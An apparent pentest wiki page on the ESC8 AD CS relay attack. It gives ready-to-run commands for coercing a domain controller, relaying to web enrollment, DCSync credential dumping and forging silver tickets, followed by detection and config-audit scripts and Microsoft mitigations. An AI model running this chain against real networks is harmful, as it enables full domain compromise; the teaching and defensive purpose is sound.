ESC8

Last updated 2 months ago


Description

ESC8 attacks fall under the category of NTLM relay attacks. Active Directory Certificate Services (AD CS) supports multiple enrollment methods, including HTTP-based enrollment, which enables users to request and obtain certificates over HTTP. The core concept of ESC8 abuse involves coercing authentication from a machine account and relaying it to AD CS to acquire a certificate that permits client authentication.

Because NTLM over HTTP carries no session signing (and, without Extended Protection for Authentication, no channel binding), an attacker who obtains NTLM authentication (through techniques like authentication coercion or poisoning) can relay it to the AD CS HTTP enrollment endpoint, if that endpoint is enabled, and request a certificate for the authenticated account.

Requirements for attack path

  • A vulnerable web enrollment endpoint (one that accepts NTLM over HTTP without Extended Protection for Authentication)

  • At least one enabled certificate template that allows domain computer enrollment and client authentication

Generally the default "Machine" template satisfies this requirement. When targeting domain controllers, the default "DomainController" template is also a viable option.

Linux

Enumeration

certipy find -u 'Moe@Security.local' -p 'Password123' -dc-ip 10.10.10.100 -stdout -vulnerable

Performing the attack

After identifying a vulnerable web enrollment endpoint, we next set up the NTLM relay. Either ntlmrelayx or certipy can be used.

In both commands shown below, be sure to select the correct template based on the type of machine account whose authentication you are relaying to the web enrollment server:

  • DomainControllers --> -template DomainController

  • Machine Accounts --> -template Machine

# Certipy, target is the ADCS server
certipy relay -target 10.10.10.2 -template DomainController

# ntlmrelayx, target is the ADCS server
impacket-ntlmrelayx -t http://10.10.10.2/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Once either of the relay listeners is running we can use Coercer to perform forced authentication.

coercer coerce -l 10.10.10.4 -t 10.10.10.2 -d security.local -u moe -p Password123 --always-continue

Once coercion is successful, both certipy and ntlmrelayx save the certificate file to the current directory.

Output
[*] Targeting http://10.10.10.2/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Requesting certificate for 'SECURITY\\DC01$' based on the template 'DomainController'
[*] Got certificate with DNS Host Name 'DC01.SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-1000'
[*] Saved certificate and private key to 'dc01.pfx'

Then use certipy to authenticate with the saved certificate and obtain the account's NT hash and a TGT (the filename matches the one reported in the relay output above):

certipy auth -pfx dc01.pfx -dc-ip 10.10.10.100
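From the defender's side, the relay above leaves a distinctive trace on the CA server itself: IIS records a network logon (Security event 4624, logon type 3) for the coerced machine account with authentication package NTLM, where the source address is the relay host rather than the machine's own address, while the workstation name the client supplied typically still names the coerced machine. The script below is an added example, not part of the original page or of any tool it references, that applies that rule to a handful of constructed event records; the inventory mapping computer accounts to their expected addresses and the use of the 4624 EventData field names are assumptions for the illustration.

```python
# Added example: flag NTLM network logons by machine accounts whose source
# address does not match the computer's own address (an NTLM relay signature).
# Event records and the address inventory are constructed for the illustration;
# field names follow the Security event 4624 EventData names.

# Constructed inventory: the address each computer account is expected to
# authenticate from. In practice this comes from DNS/DHCP or a CMDB.
INVENTORY = {
    "DC01$": {"10.10.10.100"},
    "WS05$": {"10.10.10.7"},
}

# Constructed 4624 records as they might appear on the CA server.
SAMPLE_EVENTS = [
    # Relayed DC01$ NTLM logon: the client claims to be DC01, but the address is the relay host.
    {"TargetUserName": "DC01$", "TargetDomainName": "SECURITY", "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "WorkstationName": "DC01", "IpAddress": "10.10.10.4"},
    # Legitimate Kerberos logon from the DC itself.
    {"TargetUserName": "DC01$", "TargetDomainName": "SECURITY", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-",
     "WorkstationName": "-", "IpAddress": "10.10.10.100"},
    # Workstation enrolling over NTLM from its own address: noisy but expected.
    {"TargetUserName": "WS05$", "TargetDomainName": "SECURITY", "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "WorkstationName": "WS05", "IpAddress": "10.10.10.7"},
    # User account logon: outside the scope of this rule.
    {"TargetUserName": "moe", "TargetDomainName": "SECURITY", "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "WorkstationName": "WS05", "IpAddress": "10.10.10.7"},
    # Service logon by a machine account is not a network relay.
    {"TargetUserName": "DC01$", "TargetDomainName": "SECURITY", "LogonType": "5",
     "AuthenticationPackageName": "Negotiate", "LmPackageName": "-",
     "WorkstationName": "-", "IpAddress": "-"},
]


def is_machine_account(name: str) -> bool:
    """Computer accounts end in '$' (e.g. DC01$)."""
    return name.endswith("$")


def find_relayed_machine_logons(events, inventory):
    """Return the events that look like relayed machine-account NTLM logons.

    Rule: LogonType 3 (network), AuthenticationPackageName NTLM, a machine
    account as the target, and a source IpAddress outside the set of
    addresses the inventory knows for that computer.
    """
    hits = []
    for ev in events:
        name = ev.get("TargetUserName", "")
        if not is_machine_account(name):
            continue
        if str(ev.get("LogonType")) != "3":
            continue
        if ev.get("AuthenticationPackageName", "").upper() != "NTLM":
            continue
        expected = inventory.get(name.upper(), set())
        if ev.get("IpAddress", "-") not in expected:
            hits.append(ev)
    return hits


def describe(ev) -> str:
    """One-line summary suitable for an alert."""
    return (f"{ev['TargetDomainName']}\\{ev['TargetUserName']} authenticated with NTLM "
            f"from {ev['IpAddress']} (client claims to be {ev['WorkstationName']})")


if __name__ == "__main__":
    for hit in find_relayed_machine_logons(SAMPLE_EVENTS, INVENTORY):
        print("possible NTLM relay:", describe(hit))
```

Run against the sample set, only the first record is flagged: the machine account is the DC's, the package is NTLM, and the address is the relay listener rather than the DC. Machine accounts legitimately authenticating with NTLM from their own address are left alone, which keeps the rule quiet on networks where NTLM is still in use.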

Post Exploitation

Various post-exploitation steps can be undertaken after obtaining a machine account hash. The below example will focus on post-exploitation with a Domain Controller hash.

DCSync

A simple approach would be to perform a DCSync with impacket-secretsdump using the domain controller hash obtained from the certificate.

# All data
impacket-secretsdump 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d 

# Single user
impacket-secretsdump 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d -just-dc-user krbtgt

Silver Ticket

As an alternative option we can generate a silver ticket for a particular service such as CIFS and then gain direct command execution over the target, in this case the Domain Controller.

Firstly, identify the domain SID.

impacket-lookupsid 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d | grep 'Domain SID is:' 

Next, we use ticketer to forge a silver ticket for a given service, in this case CIFS on the Domain Controller.

impacket-ticketer -nthash 1fe859c38adaa592ad52559fd9ab584d -domain-sid S-1-5-21-13999771-2333344039-1820745628 -domain security.local -spn cifs/dc01.security.local Administrator 

Then point KRB5CCNAME at the forged ticket so that Kerberos-aware tools use it.

export KRB5CCNAME=Administrator.ccache

Finally, authenticate and issue commands.

nxc smb dc01.security.local --use-kcache -x 'whoami'

Windows

Local administrator rights are required on Windows to perform this attack as SMB traffic needs to be redirected to a non-default port.

Enumeration

Certify does not identify web enrollment endpoints, so some manual identification is needed. Browse to the Web Enrollment page of the Certificate Authority:

http://ca.security.local/certsrv/certfnsh.asp

If connecting over plain HTTP returns an authentication prompt, the endpoint is likely vulnerable to ESC8.

Performing the attack

Tools used in this section:

  • NTLMrelayx.exe: https://github.com/The-Viper-One/RedTeam-Binaries/blob/main/ntlmrelayx.exe

  • DivertTCPconn: https://github.com/Arno0x/DivertTCPconn/tree/master/compiled_binaries/Binaries_x64

  • SharpEFSTrigger: https://github.com/The-Viper-One/RedTeam-Pentest-Tools/blob/main/Coercion/SharpEfsTrigger.exe

Usage

Configure DivertTCPconn to redirect SMB traffic to port 8445 (requires local admin).

.\divertTCPConn.exe 445 8445

Set up NTLMRelayx and target the Certificate Authority web enrollment endpoint, making sure to specify --smb-port 8445.

In the command shown below, be sure to select the correct template based on the type of machine account whose authentication you are relaying to the web enrollment server:

  • DomainControllers --> --template DomainController

  • Machine Accounts --> --template Machine

.\ntlmrelayx.exe --smb-port 8445 -t http://ca.security.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Coerce a Domain Controller to authenticate to the testing host in order to capture a certificate for the Domain Controller.

.\SharpEfsTrigger.exe [Target] [Listening-Host] [API Call]
.\SharpEfsTrigger.exe 10.10.10.100 10.10.10.3 EfsRpcEncryptFileSrv

This should capture the certificate of the Domain Controller, provided the coercion is successful.

Post Exploitation

DCSync

A simple approach would be to perform a DCSync with PsMapExec using the domain controller TGT obtained from the certificate.

PsMapExec -targets 'dc01' -domain 'security.local' -method 'dcsync' -showoutput -ticket 'doIGRjCCBkKgAwIBBaEDAgEWooI....'

Mitigation

  • Enable Extended Protection for Authentication (EPA) for Certificate Authority Web Enrollment (and Certificate Enrollment Web Service, if deployed); EPA requires the site to be served over HTTPS.

  • Disable NTLM for Internet Information Services (IIS) on AD CS servers in your domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services.

URL: https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429

Disable NTLM on any AD CS servers in your domain using the group policy "Network security: Restrict NTLM: Incoming NTLM traffic". To configure this GPO, open Group Policy and go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options and set Network security: Restrict NTLM: Incoming NTLM traffic to Deny All Accounts or Deny All domain accounts. If needed, you can add exceptions using the setting "Network security: Restrict NTLM: Add server exceptions in this domain".
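To check whether the mitigations above are actually in place on a CA, the relevant IIS settings live under the CertSrv location in applicationHost.config (%windir%\System32\inetsrv\config\): the sslFlags attribute of the access element, the tokenChecking value of extendedProtection under windowsAuthentication, and the authentication providers list. The script below is an added example, not part of the original page or of any vendor tooling, that audits a config fragment for those three settings side by side on a weak and a hardened configuration; both fragments are constructed for the illustration and the location path "Default Web Site/CertSrv" is assumed from a default installation.

```python
# Added example: audit an IIS applicationHost.config fragment for the three
# ESC8-relevant settings on the CertSrv application. The two fragments are
# constructed; the location path is an assumption (default install layout).
import xml.etree.ElementTree as ET

CERTSRV_PATH = "Default Web Site/CertSrv"

# Constructed: HTTP allowed, EPA off, NTLM offered.
WEAK_CONFIG = """<configuration>
  <location path="Default Web Site/CertSrv">
    <system.webServer>
      <security>
        <access sslFlags="None" />
        <authentication>
          <anonymousAuthentication enabled="false" />
          <windowsAuthentication enabled="true">
            <extendedProtection tokenChecking="None" flags="None" />
            <providers>
              <clear />
              <add value="Negotiate" />
              <add value="NTLM" />
            </providers>
          </windowsAuthentication>
        </authentication>
      </security>
    </system.webServer>
  </location>
</configuration>"""

# Constructed: HTTPS required, EPA required, Kerberos-only Negotiate (per KB5005413).
HARDENED_CONFIG = """<configuration>
  <location path="Default Web Site/CertSrv">
    <system.webServer>
      <security>
        <access sslFlags="Ssl, SslNegotiateCert" />
        <authentication>
          <anonymousAuthentication enabled="false" />
          <windowsAuthentication enabled="true">
            <extendedProtection tokenChecking="Require" flags="None" />
            <providers>
              <clear />
              <add value="Negotiate:Kerberos" />
            </providers>
          </windowsAuthentication>
        </authentication>
      </security>
    </system.webServer>
  </location>
</configuration>"""


def _find_location(root, path):
    """Return the <location> element for the given IIS path or raise."""
    for loc in root.iter("location"):
        if loc.get("path") == path:
            return loc
    raise ValueError(f"no <location path={path!r}> in config")


def audit_certsrv(config_xml: str, path: str = CERTSRV_PATH):
    """Return a list of (check, detail) findings; an empty list means all pass."""
    loc = _find_location(ET.fromstring(config_xml), path)
    findings = []

    # 1. Transport: plain HTTP is what the relay targets, and EPA only
    #    protects a TLS channel, so the Ssl flag must be set.
    access = next(loc.iter("access"), None)
    raw_flags = access.get("sslFlags", "None") if access is not None else "None"
    ssl_flags = {f.strip() for f in raw_flags.split(",")}
    if "Ssl" not in ssl_flags:
        findings.append(("ssl", f"HTTP permitted (sslFlags={raw_flags})"))

    winauth = next(loc.iter("windowsAuthentication"), None)
    if winauth is not None and winauth.get("enabled", "false").lower() == "true":
        # 2. Channel binding: tokenChecking must be Require, not None or Allow.
        epa = next(winauth.iter("extendedProtection"), None)
        token_checking = epa.get("tokenChecking", "None") if epa is not None else "None"
        if token_checking != "Require":
            findings.append(("epa", f"Extended Protection not required (tokenChecking={token_checking})"))

        # 3. Providers: an explicit NTLM provider, or plain Negotiate (which
        #    can fall back to NTLM), still leaves NTLM available to a relay.
        providers = [add.get("value", "") for add in winauth.iter("add")]
        weak = [p for p in providers if p.upper() == "NTLM" or p == "Negotiate"]
        if weak:
            findings.append(("ntlm", f"NTLM still offered via providers {weak}"))

    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_certsrv(cfg) or "OK")
```

On a live server the same fragment can be obtained with `appcmd list config "Default Web Site/CertSrv" -section:system.webServer/security` or by reading applicationHost.config directly; the weak fragment yields three findings (ssl, epa, ntlm) and the hardened one none. The three checks are intentionally independent, since an environment that cannot yet drop NTLM still gains protection from requiring HTTPS and EPA.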